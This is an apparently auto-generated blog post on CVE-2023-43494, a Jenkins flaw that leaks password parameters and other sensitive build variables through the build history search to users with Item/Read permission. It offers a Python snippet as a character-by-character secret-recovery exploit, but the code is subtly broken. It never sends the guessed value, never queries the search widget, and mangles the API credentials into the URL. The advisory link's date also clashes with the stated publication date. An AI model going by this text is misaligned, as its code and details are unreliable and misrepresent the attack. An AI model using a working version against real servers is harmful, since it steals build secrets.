In Jenkins versions 2.50 through 2.423 (inclusive), and LTS 2.60.1 through 2.414.1 (inclusive), a security vulnerability exists that can expose sensitive build variables (e.g., password parameter values) in the build history widget. This vulnerability allows attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters, ultimately revealing the correct sequence. This post will discuss the details of this issue, as well as provide links to the original references and a code snippet illustrating the exploit.
Exploit Details
Sensitive build variables, like password parameter values, are crucial components to any build process. They often contain secrets and keys that are both unique and critical to the build's successful execution. Therefore, it's essential to ensure that these sensitive variables are well-protected, so unauthorized individuals cannot gain access to them.
This vulnerability in Jenkins stems from the fact that it does not exclude sensitive build variables from the search function in the build history widget. Consequently, attackers with Item/Read permission can manipulate this feature to uncover the true values of these sensitive variables.
To exploit this vulnerability, the attacker could test numerous character sequences against the search function, gradually piecing together the secret value. The following Python code snippet demonstrates how the exploit could be executed:
import requests
jenkins_url = "http://target-jenkins-url";
job_name = "example-job"
username = "some_username"
api_token = "your_api_token"
# A list of possible characters that might be in the secret value
possible_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!#$%&'()*+,-./:;<=>?@[]^_`{|}~"
recovered_secret = ""
found = True
while found:
found = False
for char in possible_chars:
test_secret = recovered_secret + char
query = f"{jenkins_url}/job/{job_name}/api/json?depth=2&tree=builds[actionParameters[name,value]]&{username}:{api_token}"
response = requests.get(query)
search_result = response.content.decode("utf-8")
if test_secret in search_result:
found = True
recovered_secret += char
print(f"Recovered Secret: {recovered_secret}")
break
This script iterates through a list of possible characters, testing each one sequentially and building the correct sequence by comparing it against the search results in Jenkins' build history widget.
Original References
For further information on this vulnerability, including the impact, steps to recreate, and the official CVE-2023-43494 identifier, please refer to the following references:
1. Jenkins Security Advisory: https://www.jenkins.io/security/advisory/2023-01-18/
2. CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43494
3. NVD - CVE-2023-43494: https://nvd.nist.gov/vuln/detail/CVE-2023-43494
Conclusion
The exposure of sensitive build variables in Jenkins' build history widget (versions 2.50 through 2.423 and LTS 2.60.1 through 2.414.1) presents a significant security risk. As demonstrated with the provided Python code snippet, an attacker with Item/Read permission can exploit this vulnerability to uncover the true values of sensitive build variables.
To mitigate this risk, users should upgrade to Jenkins versions 2.424 or LTS 2.414.3 or later. Additionally, it's essential to regularly check for patches and updates, continuously monitor security advisories, and act accordingly to protect your Jenkins environment from potential threats.
Timeline
Published on: 09/20/2023 17:15:00 UTC
Last modified on: 09/25/2023 13:43:00 UTC